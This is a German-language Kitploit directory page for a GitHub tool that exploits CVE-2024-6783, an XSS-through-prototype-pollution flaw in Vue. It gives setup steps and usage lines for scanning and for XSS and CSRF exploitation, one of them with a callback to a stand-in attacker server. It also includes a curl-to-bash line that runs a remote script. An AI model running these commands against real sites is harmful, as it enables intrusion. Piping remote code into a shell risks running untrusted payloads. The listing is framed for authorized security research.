Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-6783 — CVE-2024-6783 - Vue CVE | Kitploit
Tools/GitHubGitHub/horkimhab/cve-2024-6783
SchwachstellenanalyseCTFLernen & BildungKuratierte RessourcenLernpfade & KurseLabs & Praxis
GitHubhorkimhab/cve-2024-6783

CVE-2024-6783

CVE-2024-6783 - Vue CVE

Repository anzeigen
vor 25 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2024-6783 - Vue CVE

In Vue wurde eine Schwachstelle entdeckt, die es einem Angreifer ermöglicht, XSS über Prototype Pollution auszuführen. Der Angreifer könnte die Prototypenkette einiger Eigenschaften wie Object.prototype.staticClass oder Object.prototype.staticStyle ändern, um beliebigen JavaScript-Code auszuführen.

Spenden

Unterstützen Sie die Wartung dieses Projekts mit PayPal oder durch Scannen des untenstehenden QR-Codes.

paypal

QR-Code für Spenden

⚡ Einfache Nutzung

Verwenden Sie dieses Projekt nur in sicheren und autorisierten Umgebungen wie:

  • Lokale virtuelle Maschinen
  • Docker-Container
  • Isolierte Laborumgebungen
  • Autorisierte Penetrationstest-Umgebungen

Beispiel-Setup:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Beispielverwendung:

root@kitploit:~
# scan only 
python cve-2024-6783.py -u https://example.com -v

# Scan & XSS Exploit 
python cve-2024-6783.py -u https://example.com -e xss

# XSS Exploit with Callback
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback

# Automatic Callback Server
python cve-2024-6783.py -u https://example.com -e persistent -c auto

# CSRF Exploitation
python cve-2024-6783.py -u https://example.com -e csrf

# Full Scan and Exploit with Verbose Output
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html

Hinweis:

  • Wenn Sie aus einem anderen Projekt klonen, müssen Sie curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y ausführen, um das verschachtelte Verzeichnis .git zu entfernen
  • z. B.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Quellen und Referenzen

  • https://www.herodevs.com/vulnerability-directory/cve-2024-6783?nes-for-vue-2
  • vue-template-compiler-patched-bio: https://github.com/bio/vue-template-compiler-patched

📚 Repository für Ausbildung und Sicherheitsforschung

Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.


⚠️ Sicherheits- und Rechtshinweis

Zweck

Dieses Repository dient ausschließlich der Ausbildung und autorisierten Sicherheitsforschung.

Es soll Nutzern dabei helfen, Folgendes zu lernen:

  • Sicherheitsschwachstellen
  • Sandbox- und Isolationskonzepte
  • Sicheres Codieren und defensive Praktiken

Nur autorisierte Nutzung

Verwenden Sie dieses Repository nur in Umgebungen, für die Sie eine Genehmigung haben, wie zum Beispiel:

  • Persönliche Labore oder virtuelle Maschinen
  • Docker- oder isolierte Umgebungen
  • Autorisierte Penetrationstests
  • Cybersicherheitsschulungen oder akademische Forschung

Unbefugte oder illegale Nutzung ist strengstens untersagt.


Keine Haftung

Die Autoren und Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.

Durch die Nutzung dieses Repositorys stimmen Sie zu, dass:

  • Sie für Ihre eigenen Handlungen verantwortlich sind
  • Sie es legal und ethisch verwenden
  • Das Projekt ohne Gewährleistung bereitgestellt wird

Ethische Nutzung

Dieses Projekt ist vorgesehen für:

  • Defensive Sicherheitsforschung
  • Cybersicherheitsausbildung
  • Bewusstsein für Schwachstellen
  • Forschung an sicheren Systemen und Software

Bitte befolgen Sie Praktiken der verantwortungsvollen Offenlegung und halten Sie alle geltenden Gesetze ein.


Kontakt

Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktieren Sie den Repository-Maintainer über GitHub.

Tool herunterladen